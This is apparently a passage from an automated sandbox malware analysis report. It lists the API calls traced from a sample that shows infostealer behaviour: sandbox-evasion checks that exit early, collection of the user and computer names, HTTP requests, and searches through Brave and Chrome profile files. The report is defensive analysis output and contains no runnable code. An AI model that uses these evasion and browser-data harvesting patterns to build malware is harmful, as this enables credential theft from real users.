                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9E28), ref: 00419995
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9E40), ref: 004199AD
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF6C20), ref: 004199C5
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,02DF9DE0), ref: 004199DE
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                              • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                              • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                              • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                              • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                              • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                            • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                              • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                              • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                              • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                              • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                              • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                              • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                              • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02E24D60,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                            • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                            • Sleep.KERNEL32(00001770), ref: 00416B04
                                            • CloseHandle.KERNEL32(?,00000000,?,02E24D60,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                            • ExitProcess.KERNEL32 ref: 00416B22
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 3511611419-0
                                            • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                            • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                            • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                            • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                            Control-flow Graph

                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                            • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                            • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                            • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                            • __aulldiv.LIBCMT ref: 00401258
                                            • __aulldiv.LIBCMT ref: 00401266
                                            • ExitProcess.KERNEL32 ref: 00401294
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                            • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                            • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                            • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1516 416af5-416b04 CloseHandle Sleep 1510->1516 1517 416ad9-416af1 call 41aad0 CreateEventA 1510->1517 1516->1508 1517->1511
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02E24D60,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                            • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                            • Sleep.KERNEL32(00001770), ref: 00416B04
                                            • CloseHandle.KERNEL32(?,00000000,?,02E24D60,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                            • ExitProcess.KERNEL32 ref: 00416B22
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                            • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                            • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                            • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                              • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02E26370), ref: 00406303
                                              • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                              • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02E2A4E0,00000000,00000000,00400100,00000000), ref: 00406385
                                              • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                              • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                            • String ID: ERROR$ERROR
                                            • API String ID: 3287882509-2579291623
                                            • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                            • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                            • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                            • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocComputerNameProcess
                                            • String ID:
                                            • API String ID: 4203777966-0
                                            • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                            • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                            • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                            • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                            • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                            • ExitProcess.KERNEL32 ref: 00401143
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$AllocCurrentExitNumaVirtual
                                            • String ID:
                                            • API String ID: 1103761159-0
                                            • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                            • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                            • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                            • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DFB25E
                                            • Module32First.KERNEL32(00000000,00000224), ref: 02DFB27E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1600995022.0000000002DFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2dfa000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: ee64465a15fef9f17ad5716b2b8b8e2b642b71bf42ba8b4ec9057745cddaa1fa
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 70F06231200710AFDB603AB9EC8DB6E76E8FF8D629F11452AE746915C0DB70EC458A69
                                            APIs
                                            • SetErrorMode.KERNEL32(00000400,?,?,03020223,?,?), ref: 03020E19
                                            • SetErrorMode.KERNEL32(00000000,?,?,03020223,?,?), ref: 03020E1E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction ID: 6f0baf4aeab1d44b851a8c96615accb784017b930bddd8a8902af21594078033
                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction Fuzzy Hash: 69D0123114522877DB402A94DC09BCDBF5CDF05B62F048011FB0DD9080C770954047E5
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                            • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                            • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                            • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                            APIs
                                              • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                              • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                              • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                              • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                              • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                              • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                            • ExitProcess.KERNEL32 ref: 004011C6
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Process$AllocName$ComputerExitUser
                                            • String ID:
                                            • API String ID: 1004333139-0
                                            • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                            • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                            • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                            • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02DFAF46
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1600995022.0000000002DFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2dfa000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: ba6a5a89d59b6a9ced15022cc58a2e919c79686bc0792047751849a2a23edeb0
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: 49112A79A00208EFDB01DF98C985E99BBF5AF08350F068095FA489B361D371EA50DF94
                                            APIs
                                            • wsprintfA.USER32 ref: 004138CC
                                            • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                            • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                            • API String ID: 1125553467-817767981
                                            • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                            • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                            • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                            • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                            • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                            • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                            • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                            • API String ID: 3334442632-726946144
                                            • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                            • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                            • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                            • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                            APIs
                                            • wsprintfA.USER32 ref: 0041492C
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                            • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                            • FindClose.KERNEL32(000000FF), ref: 00414B92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
